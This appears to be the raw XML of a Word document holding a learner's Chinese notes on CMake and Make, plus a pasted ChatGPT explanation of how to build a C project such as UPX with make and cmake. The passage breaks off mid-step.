    <w:p w14:paraId="50811B8D" w14:textId="6C6248E0" w:rsidR="00C8665B" w:rsidRPr="0095219D" w:rsidRDefault="0095219D" w:rsidP="00C8665B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="009E3EAB" w:rsidRPr="009E3EAB">
        <w:t>CMakeLists.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件通常要求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmake</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332875D4" w14:textId="14494851" w:rsidR="00AC48DB" w:rsidRDefault="00C8665B" w:rsidP="0095219D">
      <w:r>
        <w:t>sudo apt install cmake</w:t>
      </w:r>
      <w:r w:rsidR="00AC48DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429DC6EF" w14:textId="45F23B34" w:rsidR="00C8665B" w:rsidRDefault="00C8665B" w:rsidP="00C8665B">
      <w:r w:rsidRPr="00C8665B">
        <w:t xml:space="preserve">cmake </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8665B">
        <w:t>version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038DC003" w14:textId="77777777" w:rsidR="0044147D" w:rsidRDefault="0044147D" w:rsidP="00C8665B"/>
    <w:p w14:paraId="7ED3CEFC" w14:textId="6226BF82" w:rsidR="0095219D" w:rsidRDefault="0095219D" w:rsidP="00C8665B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="001857ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>akefile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37449EF5" w14:textId="672B954B" w:rsidR="00C8665B" w:rsidRPr="00C55875" w:rsidRDefault="00C8665B" w:rsidP="00C8665B">
      <w:r w:rsidRPr="00C8665B">
        <w:t>make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB65587" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B91C45C" w14:textId="5A6352D5" w:rsidR="0044147D" w:rsidRDefault="0044147D" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在通常在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Makefile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中可以看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmake</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmake</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会执行</w:t>
      </w:r>
      <w:r w:rsidRPr="009E3EAB">
        <w:t>CMakeLists.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的指令，生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Makefile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFC9149" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>怎么编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475E9FD2" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如我看到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UPX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目：</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t>https://github.com/upx/upx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14261056" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875"/>
    <w:p w14:paraId="134D6CF1" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t xml:space="preserve">how to compile an entire C project? I see there is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Makefile</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CMakeLists.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>./src directory</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t xml:space="preserve"> in a C project. please tell me what are they, and the instruction?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5907C9" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ChatGPT said:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8C6045" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A55FE07" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t>When compiling an entire C project, the presence of files like Makefile, CMakeLists.txt, and a ./src directory indicates that the project is organized in a typical way, using build systems like Make or CMake to manage the compilation process. Here's an explanation of each component and how to compile the project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFF068C" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Makefile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AADE96" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t>: A Makefile is a script used by the make build automation tool. It contains instructions on how to compile and link the program, specifying dependencies between files, compiler options, and the commands to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5729DD08" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How to use it</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C11731D" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t>If the project has a Makefile, you can usually compile the entire project by simply running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447A1F5D" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C120822" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t xml:space="preserve">This command will </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>execute the instructions in the Makefile</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t>, compiling all necessary source files and linking them into the final executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACEAF8E" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t xml:space="preserve">Often, the Makefile includes different targets, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>clean</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>remove</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> compiled files or install</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t xml:space="preserve"> to install the program. You can invoke these with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6631C50F" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>make clean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E61AEA3" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>make install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2475630E" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. CMakeLists.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4665E0A2" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CMakeLists.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>a configuration file used by CMake</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t xml:space="preserve">, a cross-platform build system. It specifies </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>how the project should be built</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t>, including which source files to compile, which libraries to link, and other build options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D678ACE" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How to use it</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1844E684" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t>To compile a project that uses CMake, you generally follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264C1C17" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mkdir build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DE526E" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cd build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0D2903" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cmake ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEB5D3D" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364BE76" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t>This process involves:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEB6B6A" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t xml:space="preserve">Creating a build directory to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>keep build files separate from the source code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6484A456" w14:textId="5694CA68" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t xml:space="preserve">Running cmake .. from </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>within the build directory</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>generate a Makefile</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0044147D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>other build scripts based on the instructions in CMakeLists.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA1678F" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t>Running make within the build directory to compile the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0EBD80" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. ./src Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1688CE90" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t>: The ./src directory typically contains the source code files for the project. This is where you'll find the .c files, .h header files, and possibly subdirectories with more code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196935EB" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it’s used</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74463669" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t>The Makefile or CMakeLists.txt will usually reference the files in the ./src directory. You typically don't need to interact directly with ./src during the build process; the build system handles it for you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A24345" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Instruction to Compile the Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFB81EA" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Using Makefile</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB3AB4D" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t>Navigate to the project directory (where the Makefile is located):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F194D96" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>cd /path/to/project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C23E45" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t>Run make to compile the project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00872D82" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE98AEC" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Using CMake</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06837082" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t>Create a build directory and navigate into it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262EFACB" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>mkdir build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7357F2B8" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>cd build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100766CC" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t>Run CMake to generate the build files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EBD465" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="cyan"/>
